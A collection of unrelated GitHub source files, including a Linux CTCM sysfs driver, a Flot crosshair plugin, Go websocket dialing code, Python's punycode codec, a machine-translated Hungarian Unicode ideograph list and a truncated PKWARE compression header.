#include <linux/sysfs.h>
#include <linux/slab.h>
#include "ctcm_main.h"
/*
* sysfs attributes
*/
static ssize_t ctcm_buffer_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct ctcm_priv *priv = dev_get_drvdata(dev);
if (!priv)
return -ENODEV;
return sprintf(buf, "%d\n", priv->buffer_size);
}
static ssize_t ctcm_buffer_write(struct device *dev,
struct device_attribute *attr, const char *buf, size_t count)
{
struct net_device *ndev;
unsigned int bs1;
struct ctcm_priv *priv = dev_get_drvdata(dev);
int rc;
ndev = priv->channel[CTCM_READ]->netdev;
if (!(priv && priv->channel[CTCM_READ] && ndev)) {
CTCM_DBF_TEXT(SETUP, CTC_DBF_ERROR, "bfnondev");
return -ENODEV;
}
rc = sscanf(buf, "%u", &bs1);
if (rc != 1)
goto einval;
if (bs1 > CTCM_BUFSIZE_LIMIT)
goto einval;
if (bs1 < (576 + LL_HEADER_LENGTH + 2))
goto einval;
priv->buffer_size = bs1; /* just to overwrite the default */
if ((ndev->flags & IFF_RUNNING) &&
(bs1 < (ndev->mtu + LL_HEADER_LENGTH + 2)))
goto einval;
priv->channel[CTCM_READ]->max_bufsize = bs1;
priv->channel[CTCM_WRITE]->max_bufsize = bs1;
if (!(ndev->flags & IFF_RUNNING))
ndev->mtu = bs1 - LL_HEADER_LENGTH - 2;
priv->channel[CTCM_READ]->flags |= CHANNEL_FLAGS_BUFSIZE_CHANGED;
priv->channel[CTCM_WRITE]->flags |= CHANNEL_FLAGS_BUFSIZE_CHANGED;
CTCM_DBF_DEV(SETUP, ndev, buf);
return count;
einval:
CTCM_DBF_DEV(SETUP, ndev, "buff_err");
return -EINVAL;
}
static void ctcm_print_statistics(struct ctcm_priv *priv)
{
char *sbuf;
char *p;
if (!priv)
return;
sbuf = kmalloc(2048, GFP_KERNEL);
if (sbuf == NULL)
return;
p = sbuf;
p += sprintf(p, " Device FSM state: %s\n",
fsm_getstate_str(priv->fsm));
p += sprintf(p, " RX channel FSM state: %s\n",
fsm_getstate_str(priv->channel[CTCM_READ]->fsm));
p += sprintf(p, " TX channel FSM state: %s\n",
fsm_getstate_str(priv->channel[CTCM_WRITE]->fsm));
p += sprintf(p, " Max. TX buffer used: %ld\n",
priv->channel[WRITE]->prof.maxmulti);
p += sprintf(p, " Max. chained SKBs: %ld\n",
priv->channel[WRITE]->prof.maxcqueue);
p += sprintf(p, " TX single write ops: %ld\n",
priv->channel[WRITE]->prof.doios_single);
p += sprintf(p, " TX multi write ops: %ld\n",
priv->channel[WRITE]->prof.doios_multi);
p += sprintf(p, " Netto bytes written: %ld\n",
priv->channel[WRITE]->prof.txlen);
p += sprintf(p, " Max. TX IO-time: %ld\n",
priv->channel[WRITE]->prof.tx_time);
printk(KERN_INFO "Statistics for %s:\n%s",
priv->channel[CTCM_WRITE]->netdev->name, sbuf);
kfree(sbuf);
return;
}
static ssize_t stats_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct ccwgroup_device *gdev = to_ccwgroupdev(dev);
struct ctcm_priv *priv = dev_get_drvdata(dev);
if (!priv || gdev->state != CCWGROUP_ONLINE)
return -ENODEV;
ctcm_print_statistics(priv);
return sprintf(buf, "0\n");
}
static ssize_t stats_write(struct device *dev, struct device_attribute *attr,
const char *buf, size_t count)
{
struct ctcm_priv *priv = dev_get_drvdata(dev);
if (!priv)
return -ENODEV;
/* Reset statistics */
memset(&priv->channel[WRITE]->prof, 0,
sizeof(priv->channel[CTCM_WRITE]->prof));
return count;
}
static ssize_t ctcm_proto_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct ctcm_priv *priv = dev_get_drvdata(dev);
if (!priv)
return -ENODEV;
return sprintf(buf, "%d\n", priv->protocol);
}
static ssize_t ctcm_proto_store(struct device *dev,
struct device_attribute *attr, const char *buf, size_t count)
{
int value, rc;
struct ctcm_priv *priv = dev_get_drvdata(dev);
if (!priv)
return -ENODEV;
rc = sscanf(buf, "%d", &value);
if ((rc != 1) ||
!((value == CTCM_PROTO_S390) ||
(value == CTCM_PROTO_LINUX) ||
(value == CTCM_PROTO_MPC) ||
(value == CTCM_PROTO_OS390)))
return -EINVAL;
priv->protocol = value;
CTCM_DBF_DEV(SETUP, dev, buf);
return count;
}
static const char *ctcm_type[] = {
"not a channel",
"CTC/A",
"FICON channel",
"ESCON channel",
"unknown channel type",
"unsupported channel type",
};
static ssize_t ctcm_type_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct ccwgroup_device *cgdev;
cgdev = to_ccwgroupdev(dev);
if (!cgdev)
return -ENODEV;
return sprintf(buf, "%s\n",
ctcm_type[cgdev->cdev[0]->id.driver_info]);
}
static DEVICE_ATTR(buffer, 0644, ctcm_buffer_show, ctcm_buffer_write);
static DEVICE_ATTR(protocol, 0644, ctcm_proto_show, ctcm_proto_store);
static DEVICE_ATTR(type, 0444, ctcm_type_show, NULL);
static DEVICE_ATTR(stats, 0644, stats_show, stats_write);
static struct attribute *ctcm_attr[] = {
&dev_attr_protocol.attr,
&dev_attr_type.attr,
&dev_attr_buffer.attr,
&dev_attr_stats.attr,
NULL,
};
static struct attribute_group ctcm_attr_group = {
.attrs = ctcm_attr,
};
const struct attribute_group *ctcm_attr_groups[] = {
&ctcm_attr_group,
NULL,
};
|
{
"pile_set_name": "Github"
}
|
/* Flot plugin for showing crosshairs when the mouse hovers over the plot.
Copyright (c) 2007-2013 IOLA and Ole Laursen.
Licensed under the MIT license.
The plugin supports these options:
crosshair: {
mode: null or "x" or "y" or "xy"
color: color
lineWidth: number
}
Set the mode to one of "x", "y" or "xy". The "x" mode enables a vertical
crosshair that lets you trace the values on the x axis, "y" enables a
horizontal crosshair and "xy" enables them both. "color" is the color of the
crosshair (default is "rgba(170, 0, 0, 0.80)"), "lineWidth" is the width of
the drawn lines (default is 1).
The plugin also adds four public methods:
- setCrosshair( pos )
Set the position of the crosshair. Note that this is cleared if the user
moves the mouse. "pos" is in coordinates of the plot and should be on the
form { x: xpos, y: ypos } (you can use x2/x3/... if you're using multiple
axes), which is coincidentally the same format as what you get from a
"plothover" event. If "pos" is null, the crosshair is cleared.
- clearCrosshair()
Clear the crosshair.
- lockCrosshair(pos)
Cause the crosshair to lock to the current location, no longer updating if
the user moves the mouse. Optionally supply a position (passed on to
setCrosshair()) to move it to.
Example usage:
var myFlot = $.plot( $("#graph"), ..., { crosshair: { mode: "x" } } };
$("#graph").bind( "plothover", function ( evt, position, item ) {
if ( item ) {
// Lock the crosshair to the data point being hovered
myFlot.lockCrosshair({
x: item.datapoint[ 0 ],
y: item.datapoint[ 1 ]
});
} else {
// Return normal crosshair operation
myFlot.unlockCrosshair();
}
});
- unlockCrosshair()
Free the crosshair to move again after locking it.
*/
(function ($) {
var options = {
crosshair: {
mode: null, // one of null, "x", "y" or "xy",
color: "rgba(170, 0, 0, 0.80)",
lineWidth: 1
}
};
function init(plot) {
// position of crosshair in pixels
var crosshair = { x: -1, y: -1, locked: false };
plot.setCrosshair = function setCrosshair(pos) {
if (!pos)
crosshair.x = -1;
else {
var o = plot.p2c(pos);
crosshair.x = Math.max(0, Math.min(o.left, plot.width()));
crosshair.y = Math.max(0, Math.min(o.top, plot.height()));
}
plot.triggerRedrawOverlay();
};
plot.clearCrosshair = plot.setCrosshair; // passes null for pos
plot.lockCrosshair = function lockCrosshair(pos) {
if (pos)
plot.setCrosshair(pos);
crosshair.locked = true;
};
plot.unlockCrosshair = function unlockCrosshair() {
crosshair.locked = false;
};
function onMouseOut(e) {
if (crosshair.locked)
return;
if (crosshair.x != -1) {
crosshair.x = -1;
plot.triggerRedrawOverlay();
}
}
function onMouseMove(e) {
if (crosshair.locked)
return;
if (plot.getSelection && plot.getSelection()) {
crosshair.x = -1; // hide the crosshair while selecting
return;
}
var offset = plot.offset();
crosshair.x = Math.max(0, Math.min(e.pageX - offset.left, plot.width()));
crosshair.y = Math.max(0, Math.min(e.pageY - offset.top, plot.height()));
plot.triggerRedrawOverlay();
}
plot.hooks.bindEvents.push(function (plot, eventHolder) {
if (!plot.getOptions().crosshair.mode)
return;
eventHolder.mouseout(onMouseOut);
eventHolder.mousemove(onMouseMove);
});
plot.hooks.drawOverlay.push(function (plot, ctx) {
var c = plot.getOptions().crosshair;
if (!c.mode)
return;
var plotOffset = plot.getPlotOffset();
ctx.save();
ctx.translate(plotOffset.left, plotOffset.top);
if (crosshair.x != -1) {
var adj = plot.getOptions().crosshair.lineWidth % 2 === 0 ? 0 : 0.5;
ctx.strokeStyle = c.color;
ctx.lineWidth = c.lineWidth;
ctx.lineJoin = "round";
ctx.beginPath();
if (c.mode.indexOf("x") != -1) {
var drawX = Math.round(crosshair.x) + adj;
ctx.moveTo(drawX, 0);
ctx.lineTo(drawX, plot.height());
}
if (c.mode.indexOf("y") != -1) {
var drawY = Math.round(crosshair.y) + adj;
ctx.moveTo(0, drawY);
ctx.lineTo(plot.width(), drawY);
}
ctx.stroke();
}
ctx.restore();
});
plot.hooks.shutdown.push(function (plot, eventHolder) {
eventHolder.unbind("mouseout", onMouseOut);
eventHolder.unbind("mousemove", onMouseMove);
});
}
$.plot.plugins.push({
init: init,
options: options,
name: 'crosshair',
version: '1.0'
});
})(jQuery);
|
{
"pile_set_name": "Github"
}
|
/* Generated by RuntimeBrowser.
*/
@protocol MTLDepthStencilStateSPI <MTLDepthStencilState>
@required
- (bool)readsDepth;
- (bool)readsStencil;
- (bool)writesDepth;
- (bool)writesStencil;
@end
|
{
"pile_set_name": "Github"
}
|
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package websocket
import (
"crypto/tls"
"net"
)
func dialWithDialer(dialer *net.Dialer, config *Config) (conn net.Conn, err error) {
switch config.Location.Scheme {
case "ws":
conn, err = dialer.Dial("tcp", parseAuthority(config.Location))
case "wss":
conn, err = tls.DialWithDialer(dialer, "tcp", parseAuthority(config.Location), config.TlsConfig)
default:
err = ErrBadScheme
}
return
}
|
{
"pile_set_name": "Github"
}
|
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
TAG = 0.4
PREFIX = gcr.io/google_containers
all: push
container: image
image:
docker build --pull -t $(PREFIX)/volume-gluster . # Build new image and automatically tag it as latest
docker tag $(PREFIX)/volume-gluster $(PREFIX)/volume-gluster:$(TAG) # Add the version tag to the latest image
push: image
gcloud docker -- push $(PREFIX)/volume-gluster # Push image tagged as latest to repository
gcloud docker -- push $(PREFIX)/volume-gluster:$(TAG) # Push version tagged image to repository (since this image is already pushed it will simply create or update version tag)
clean:
|
{
"pile_set_name": "Github"
}
|
$VERSION = 0.01;
1;
|
{
"pile_set_name": "Github"
}
|
8800:
8801: Ideográf lárvák, CJK grubok : hoeng2 : xiǎng
8802:
8803: Ideográf a CJK egyedülálló darázs : lo2 lo4 : luǒ
8804: Ideográf (Cant.) 蠄 蟧, egy pók;蠄 蟝, egy varangy CJK : kam4 : Qin
8805: Ideográf repül CJK-val : jing4 : Ying
8806: Ideográf egyfajta skorpió; a farok CJK-jában : caai3 : chai
8807:
8808:
8809: Ideograph szúnyog lárvák, cigányok CJK : hyun1 : Xuan
880A:
880B: Ideograph caterpillar CJK : zuk1 : Zhu
880C:
880D: Ideograph scorpion CJK : hit3 kit3 : Xie
880E: Ideográf python, boa constrictor CJK : mǎng
880F: Ideográf rák, brachyura CJK : haai5 : Xie
8810: Ideográfiás gubók, CJK-k : cai4 : Qi
8811: Ideográf gyík CJK : wing4 : Rong
8812:
8813: Ideográf kanyarok; sandflies CJK : mung5 : Meng
8814: Ideográf osztriga CJK : hou4 : Hao
8815: Ideograph eumenes polifomis, fajta darázs CJK : jyu4 : ru
8816: Ideográf hüvely-féreg; looper caterpiller CJK : wok6 : Huo
8817:
8818:
8819: Ideográf osztriga CJK : ban1 pan4 : tű
881A:
881B: Ideográf legyek, nedves helyen előállított kis rovarok CJK : mit6 : Mie
881C: Ideograph szöcske CJK : faan4 : ventilátor
881D:
881E:
881F: Ideográf viasz; gyertya; viaszos, mázas CJK : laap6 : là
8820:
8821: Ideográf fafúró rovar; a fa CJK-ba került : lai5 : Lí
8822: Ideográfiás rángatózás; hülye; bolondos; zsír CJK : ceon2 : chǔn
8823: Ideográf osztriga CJK : lai6 : Li
8824:
8825:
8826:
8827: Ideográf moly; rovarok, amelyek CJK ruhát fogyasztanak : dou3 dou6 : du
8828: Ideográf egyfajta pók, hosszú lábakkal CJK : siu1 : Xiao
8829: Ideograph egy varangy CJK : Zhu
882A:
882B:
882C:
882D: Ideográf méhek, hornetok, darazsak CJK : fung1 : Feng
882E: Ideográf méh CJK : jit6 : te
882F:
8830:
8831: Ideográf méreg; méreg; sérelem; CJK : GU2 : gǔ
8832: Ideograph a millipede, akit néha megzavartak a növekedés féreggel; világos, tiszta CJK : gyun1 : Juan
8833:
8834:
8835: Ideograph nagy teknősök CJK : kwai4 : Xi
8836: Ideográfiai selyemhernyók CJK : caam4 : tud
8837:
8838:
8839: Ideográf moly; rovarok, amelyek a CJK-ban alvadnak : dou3 : du
883A: Ideográf ugyanaz, mint 蚕 U + 8695 selyemhernyók CJK : tud
883B: Ideográf barbárok; barbár, vad CJK : maan4 : Férfi
883C:
883D:
883E:
883F:
8840: Ideográf vér; 143 CJK csoport : hyut3 : Xue
8841: Ideográf vér CJK : fong1 : Huang
8842: Az Ideográf legyőzése CJK : luk6 nuk6 : nǜ
8843:
8844: Ideograph epistaxis, orrvérzés; legyőzni CJK-t : nuk6 : nǜ
8845: Az ideográfia az áldozati edényeket a vér elkenődésével szenteli; szakadjon CJK-t : jan3 : Xin
8846: Ideograph sokaság, tömeg; tömegek, nyilvános CJK : zung3 : Zhong
8847: Ideográf véredények, vénák, artériák CJK : mak6 : Mai
8848: Ideograph az áldozati tyúk vérét, amelyet az ajtókon és a hajókon megszórjuk CJK : ji6 nei6 : ÈR
8849: Ideograph, hogy hány CJK : kā
884A: Ideográf kenet, rágalom; defilálja CJK-t : mit6 : Mie
884B:
884C: Ideograph megy; séta; mozgás, utazás; CJK-t forgalmaz : haang4 hang4 hang6 hong4 : Xing
884D: Az Ideograph túlcsordulás, a kiömlés, a CJK kiszórása : hin2 jin2 jin5 : yǎn
884E: Ideográf, hogy örömet adjon; elégedett, boldog CJK : hon2 hon3 : Kàn
884F:
8850:
8851:
8852: Ideográf brag; mutogasson, támogassa CJK-t : jyun6 : Xuan
8853: Ideográf művészet, készség, különleges műsor; módszer, technika CJK : seot6 : Shu
8854: Ideográf bit; tartsd szájban, harapj; CJK : haam4 : Xián
8855: Ideograph alley, CJK sáv : dung6 tung4 : tong
8856: Ideográf sáv; CJK sikátor : hong6 tüdő6 : Xiang
8857: Ideográf utca, út, út CJK : gaai1 : Jie
8858:
8859: Ideográf közhivatal; hivatalos tartózkodási hely CJK : ngaa4 : YA
885A: Ideográf sáv, sikátor, CJK mellékutca : wu4 : HU
885B: Ideográf védő, védi, védje CJK-t : wai6 : Wei
885C: Ideográf út, CJK út : Dao
885D: Ideograph rohanás ellen, CJK előre : cung1 cung3 : Chong
885E: Ideográf védő, védi, védje CJK-t : wai6 : Wei
885F:
8860:
8861: Ideográf mérés, mérlegelés, bíró, CJK : hang4 waang4 : Heng
8862: Ideográf autópálya; kereszteződés, CJK kereszteződés : keoi4 : qu
8863: Ideográf ruhák, ruházat; borítás, bőr CJK : ji1 ji3 : Yi
8864: Ideográf ruhák; 145 CJK csoport : Yi
8865: Ideograph javítás, javítás, javítás, helyreállítás, CJK helyreállítása : bou2 : bǔ
8866: Az Ideograph kiegyenlíti a ruhákat CJK : gǎn
8867:
8868: Ideograph show, express, manifest, CJK megjelenítése : biu2 : biǎo
8869: Ideográf a ruhadarab nyílt varrása, amely lehetővé teszi a mozgás szabadságát CJK : Caa3 : chǎ
886A:
886B: Ideográf póló; palást; ruhában; kabát CJK : saam1 : Shan
886C: Ideograph fehérnemű; belső ruhák CJK : can3 : Chen
886D: Ideográf a ruházat CJK hajtóka : fu1 fu3 : Fu
886E: CJK császár által viselt Ideograph ünnepi ruha : gwan2 : gǔn
886F:
8870: Ideográfiás csökkenés, elakadás, csökkenés; gyengíti CJK-t : ceoi1 seoi1 : Shuai
8871:
8872: Ideográf kijavít, varrni, tapaszt; vonal; paplan CJK : naap6 : na
8873:
8874:
8875: Ideográf hálószoba CJK : jat6 nik1 : Yi
8876:
8877: Ideográf szív, szívünk aljáról CJK : cung1 zung1 : Zhong
8878:
8879: Csak Ideográf, csak CJK : zi2 -vel : zhǐ
887A: Ideográfiás rés a CJK mozgását segítő ruhában : Xie
887B:
887C:
887D: Ideográf hajtóka; rejtett hajtóka a kabát CJK : jam5 jam6 : Ren
887E: Ideográf fedőlap, paplan CJK : kam1 : Qin
887F: Ideográf gallér vagy CJK ruhadarab : gam1 kam1 : Jin
8880:
8881: Ideográf-köntös; CJK vezetéknév : jyun4 : yuan
8882: Ideográf hüvelyek CJK : mai6 : Mei
8883:
8884: Ideográf külső ruházat; kabát, kabát CJK : OU2 : ǎo
8885: Ideográf felfelé görbül; gyengéden vándorolva CJK : niu5 : niǎo
8886: Egy királynő CJK Ideograph ünnepi ruhája : FAI1 : Hui
8887:
8888: Ideográf buddhista cassock CJK : gaa1 : Jia
8889:
888A:
888B: Ideográf zseb, táska, zsák, tasak CJK : doi6 : dai
888C:
888D: Ideográf hosszú ruha, köntös, köpeny CJK : pou4 : Pao
888E:
888F:
8890:
8891:
8892: Ideográf csík; leleplez vkit; csupasz; meztelen CJK : taan2 : tǎn
8893:
8894:
8895:
8896: Ideográf hüvely; tegyen valamit CJK-ba : zau6 : Xiu
8897: Ideográf nem szegélyezett ruházat; CJK ruhadarab : can2 zan2 : Zhen
8898:
8899:
889A: Ideográf zsír; térd védők; Buskins CJK : fai3 zsír1 : BO
889B:
889C: Ideograph zokni, harisnya CJK : mat6 : WA
889D:
889E: CJK császár által viselt Ideograph ünnepi ruha : gwan2 : gǔn
889F: Ideográf könyvborító; táska vagy táska CJK : dit6 : Zhi
88A0: Ideográf könyvborító; táska vagy táska CJK : dit6 : Zhi
88A1:
88A2: Ideográf köpeny CJK : paan3 : Pán
88A3:
88A4: Ideográf hosszúság, hosszirányban; hossza CJK : mau6 : Mao
88A5:
88A6:
88A7:
88A8:
88A9:
88AA: Ideográf hüvelyek; mandzsetta CJK : keoi1 : qu
88AB: „Ideograph” passzív indikátor; ágynemű CJK : bei6 pei1 pei5 : bei
88AC:
88AD: Ideográf raid, támadás; örökölje CJK-t : zaap6 : Xi
88AE: Az U + 4F60 你 szinonimaként használt Ideográf, amikor az istenség CJK-ra utal : nei5 ji5 : mí
88AF: Ideograph esőkabát CJK : but6 : bó
88B0:
88B1: Ideográf egy használt ruhadarab csomagolás CJK : fuk6 : Fu
88B2:
88B3: Az Ideograph a ruháit CJK-ra terítette : chǐ
88B4: Ideográf nadrág; nadrág; CJK bugyi : fu3 : ku
88B5: Ideográf hajtóka; rejtett hajtóka a kabát CJK : jam4 : Ren
88B6:
88B7: Ideograph bélelt ruha CJK : gaap3 : Jia
88B8:
88B9:
88BA: Az Ideograph felemeli a CJK-t : git3 : Jie
88BB:
88BC:
88BD: Ideográf ruhák CJK : jyu4 : ru
88BE:
88BF: Ideográf ruha CJK : gwai1 : Gui
88C0: Ideográf szőnyeg, takaró; fehérnemű CJK : jan1 : Yin
88C1: Ideográf kivágása; csökken CJK : coi4 : CAI
88C2: Ideográf osztás, repedés, szakadás; rend CJK : lit6 : hazugság
88C3: Ideográf régi szertartás; samurai garb CJK : kǎ
88C4: Ideográf hüvely hossza CJK : xing
88C5: Ideográf ruha, ruházat, öltözék; töltse ki a CJK-t : zong1 : Zhuang
88C6: Ideográfiás nyakörv vagy nadrág ülés; CJK : dong1 : Dang
88C7: Ideograph (Cant.) Ing (Engel. Hitel) CJK : seot1 : Xu
88C8: Ideograph nadrágok, nadrágok, nadrágok, fiókok CJK : gwan1 : Kun
88C9: Ideográf varrás ruhában CJK : kang3 : Ken
88CA: Ideográf felfelé görbül; gyengéden vándorolva CJK : niu5 : niǎo
88CB: CJK fiúszolgálat Ideograph pamut ruhája : syu6 : Shu
88CC: Ideograph bélelt ruha CJK : gaap3 : Jia
88CD: Ideográf egy szegély vagy zenekar a ruha szélén CJK : kǔn
88CE: Ideográf, hogy vegye le a ruhákat és tegye ki a testet. CJK-ban hordoz : cing4 : Cheng
88CF: Ideográf belül, belső, belül CJK : lei5 leoi5 : lǐ
88D0:
88D1:
88D2: Ideográf összegyűjti, összegyűjti, összeszed; dicséret CJK : fau4 pau4 : Pou
88D3:
88D4: Ideográf utódok, utódok, utódok CJK : jeoi6 : Yi
88D5: Ideograph bőséges, gazdag, bőséges CJK : jyu6 : yu
88D6:
88D7:
88D8: Ideográfiai prémes ruhák; CJK vezetéknév : kau4 : Qiu
88D9: Ideográf szoknya, kötény, petticoat CJK : kwan4 : Qun
88DA:
88DB: Ideográf a kötéshez és kötéshez; nyirkos; CJK könyveszsák : jap1 : Yi
88DC: Ideograph javítás, javítás, javítás, helyreállítás, CJK helyreállítása : bou2 : bǔ
88DD: Ideográf ruha, ruha; díszít; töltse ki a CJK-t : zong1 : Zhuang
88DE:
88DF: Ideograph egy szerzetes vagy köpeny egy szerzetes CJK : SAA1 : SHA
88E0: Ideográf egy rövid szoknya CJK : Qun
88E1: Ideográf belül, belső, belül CJK : lei5 leoi5 : lǐ
88E2: Ideográf összecsukható pénztárcája a CJK övbe : lin4 : Lian
88E3: Az Ideograph a CJK hüvelyébe húzza a kezét : lim6 : liǎn
88E4: Ideográf nadrág, nadrág CJK : fu3 : ku
88E5: Ideográf hajtások CJK : jiǎn
88E6:
88E7:
88E8: Ideográf támogatás, javak, segítség; kiegészítő CJK : bei1 pei4 : kettős
88E9:
88EA: Ideograph a hüvely CJK : Tao
88EB:
88EC:
88ED:
88EE:
88EF: Ideográf fedőlap; ágytakaró CJK : cau4 : Chou
88F0: Ideograph a ruhák CJK javítására : zyut3 : duó
88F1: Ideográf a térképek vagy görgetések beillesztéséhez a CJK beillesztéséhez : biu2 : biǎo
88F2: Ideográf mellény CJK : loeng5 : liǎng
88F3: Ideográf ruhák; szoknya; gyönyörű CJK : soeng4 : Shang
88F4: Ideográf vezetéknév; egy áramló ruha CJK : pui4 : Pei
88F5: Ideográf vezetéknév; egy áramló ruha CJK : pui4 : Pei
88F6:
88F7:
88F8: Ideográf csupasz, meztelen; levetkőzni, csík CJK : lo2 : luǒ
88F9: Ideográf burkolás, kötés; körülveszi a CJK-t : gwo2 : guǒ
88FA:
88FB:
88FC: Ideográf, hogy vegye le a tetejét; eladja a CJK-t : sik3 tik1 : Ti
88FD: Ideográf gyártás, gyártás; gyárt CJK-t : zai3 : Zhi
88FE: Ideográf hajtóka, ruházati szegély; szoknya CJK : geoi1 : Ju
88FF:
|
{
"pile_set_name": "Github"
}
|
# -*- coding: iso-8859-1 -*-
""" Codec for the Punicode encoding, as specified in RFC 3492
Written by Martin v. Löwis.
"""
import codecs
##################### Encoding #####################################
def segregate(str):
"""3.1 Basic code point segregation"""
base = []
extended = {}
for c in str:
if ord(c) < 128:
base.append(c)
else:
extended[c] = 1
extended = extended.keys()
extended.sort()
return "".join(base).encode("ascii"),extended
def selective_len(str, max):
"""Return the length of str, considering only characters below max."""
res = 0
for c in str:
if ord(c) < max:
res += 1
return res
def selective_find(str, char, index, pos):
"""Return a pair (index, pos), indicating the next occurrence of
char in str. index is the position of the character considering
only ordinals up to and including char, and pos is the position in
the full string. index/pos is the starting position in the full
string."""
l = len(str)
while 1:
pos += 1
if pos == l:
return (-1, -1)
c = str[pos]
if c == char:
return index+1, pos
elif c < char:
index += 1
def insertion_unsort(str, extended):
"""3.2 Insertion unsort coding"""
oldchar = 0x80
result = []
oldindex = -1
for c in extended:
index = pos = -1
char = ord(c)
curlen = selective_len(str, char)
delta = (curlen+1) * (char - oldchar)
while 1:
index,pos = selective_find(str,c,index,pos)
if index == -1:
break
delta += index - oldindex
result.append(delta-1)
oldindex = index
delta = 0
oldchar = char
return result
def T(j, bias):
# Punycode parameters: tmin = 1, tmax = 26, base = 36
res = 36 * (j + 1) - bias
if res < 1: return 1
if res > 26: return 26
return res
digits = "abcdefghijklmnopqrstuvwxyz0123456789"
def generate_generalized_integer(N, bias):
"""3.3 Generalized variable-length integers"""
result = []
j = 0
while 1:
t = T(j, bias)
if N < t:
result.append(digits[N])
return result
result.append(digits[t + ((N - t) % (36 - t))])
N = (N - t) // (36 - t)
j += 1
def adapt(delta, first, numchars):
if first:
delta //= 700
else:
delta //= 2
delta += delta // numchars
# ((base - tmin) * tmax) // 2 == 455
divisions = 0
while delta > 455:
delta = delta // 35 # base - tmin
divisions += 36
bias = divisions + (36 * delta // (delta + 38))
return bias
def generate_integers(baselen, deltas):
"""3.4 Bias adaptation"""
# Punycode parameters: initial bias = 72, damp = 700, skew = 38
result = []
bias = 72
for points, delta in enumerate(deltas):
s = generate_generalized_integer(delta, bias)
result.extend(s)
bias = adapt(delta, points==0, baselen+points+1)
return "".join(result)
def punycode_encode(text):
base, extended = segregate(text)
base = base.encode("ascii")
deltas = insertion_unsort(text, extended)
extended = generate_integers(len(base), deltas)
if base:
return base + "-" + extended
return extended
##################### Decoding #####################################
def decode_generalized_number(extended, extpos, bias, errors):
"""3.3 Generalized variable-length integers"""
result = 0
w = 1
j = 0
while 1:
try:
char = ord(extended[extpos])
except IndexError:
if errors == "strict":
raise UnicodeError, "incomplete punicode string"
return extpos + 1, None
extpos += 1
if 0x41 <= char <= 0x5A: # A-Z
digit = char - 0x41
elif 0x30 <= char <= 0x39:
digit = char - 22 # 0x30-26
elif errors == "strict":
raise UnicodeError("Invalid extended code point '%s'"
% extended[extpos])
else:
return extpos, None
t = T(j, bias)
result += digit * w
if digit < t:
return extpos, result
w = w * (36 - t)
j += 1
def insertion_sort(base, extended, errors):
"""3.2 Insertion unsort coding"""
char = 0x80
pos = -1
bias = 72
extpos = 0
while extpos < len(extended):
newpos, delta = decode_generalized_number(extended, extpos,
bias, errors)
if delta is None:
# There was an error in decoding. We can't continue because
# synchronization is lost.
return base
pos += delta+1
char += pos // (len(base) + 1)
if char > 0x10FFFF:
if errors == "strict":
raise UnicodeError, ("Invalid character U+%x" % char)
char = ord('?')
pos = pos % (len(base) + 1)
base = base[:pos] + unichr(char) + base[pos:]
bias = adapt(delta, (extpos == 0), len(base))
extpos = newpos
return base
def punycode_decode(text, errors):
pos = text.rfind("-")
if pos == -1:
base = ""
extended = text
else:
base = text[:pos]
extended = text[pos+1:]
base = unicode(base, "ascii", errors)
extended = extended.upper()
return insertion_sort(base, extended, errors)
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
res = punycode_encode(input)
return res, len(input)
def decode(self,input,errors='strict'):
if errors not in ('strict', 'replace', 'ignore'):
raise UnicodeError, "Unsupported error handling "+errors
res = punycode_decode(input, errors)
return res, len(input)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return punycode_encode(input)
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
if self.errors not in ('strict', 'replace', 'ignore'):
raise UnicodeError, "Unsupported error handling "+self.errors
return punycode_decode(input, self.errors)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='punycode',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
|
{
"pile_set_name": "Github"
}
|
/*****************************************************************************/
/* pklib.h Copyright (c) Ladislav Zezula 2003 */
/*---------------------------------------------------------------------------*/
/* Header file for PKWARE Data Compression Library */
/*---------------------------------------------------------------------------*/
/* Date Ver Who Comment */
/* -------- ---- --- ------- */
/* 31.03.03 1.00 Lad The first version of pkware.h */
/*****************************************************************************/
#ifndef __PKLIB_H__
#define __PKLIB_H__
#include "../StormPort.h"
//-----------------------------------------------------------------------------
// Defines
#define CMP_BINARY 0 // Binary compression
#define CMP_ASCII 1 // Ascii compression
#define CMP_NO_ERROR 0
#define CMP_INVALID_DICTSIZE 1
#define CMP_INVALID_MODE 2
#define CMP_BAD_DATA 3
#define CMP_ABORT 4
#define CMP_IMPLODE_DICT_SIZE1 1024 // Dictionary size of 1024
#define CMP_IMPLODE_DICT_SIZE2 2048 // Dictionary size of 2048
#define CMP_IMPLODE_DICT_SIZE3 4096 // Dictionary size of 4096
//-----------------------------------------------------------------------------
// Define calling convention
#ifndef PKEXPORT
#ifdef WIN32
#define PKEXPORT __cdecl // Use for normal __cdecl calling
#else
#define PKEXPORT
#endif
#endif
//-----------------------------------------------------------------------------
// Internal structures
// Compression structure
typedef struct
{
unsigned int distance; // 0000: Backward distance of the currently found repetition, decreased by 1
unsigned int out_bytes; // 0004: # bytes available in out_buff
unsigned int out_bits; // 0008: # of bits available in the last out byte
unsigned int dsize_bits; // 000C: Number of bits needed for dictionary size. 4 = 0x400, 5 = 0x800, 6 = 0x1000
unsigned int dsize_mask; // 0010: Bit mask for dictionary. 0x0F = 0x400, 0x1F = 0x800, 0x3F = 0x1000
unsigned int ctype; // 0014: Compression type (CMP_ASCII or CMP_BINARY)
unsigned int dsize_bytes; // 0018: Dictionary size in bytes
unsigned char dist_bits[0x40]; // 001C: Distance bits
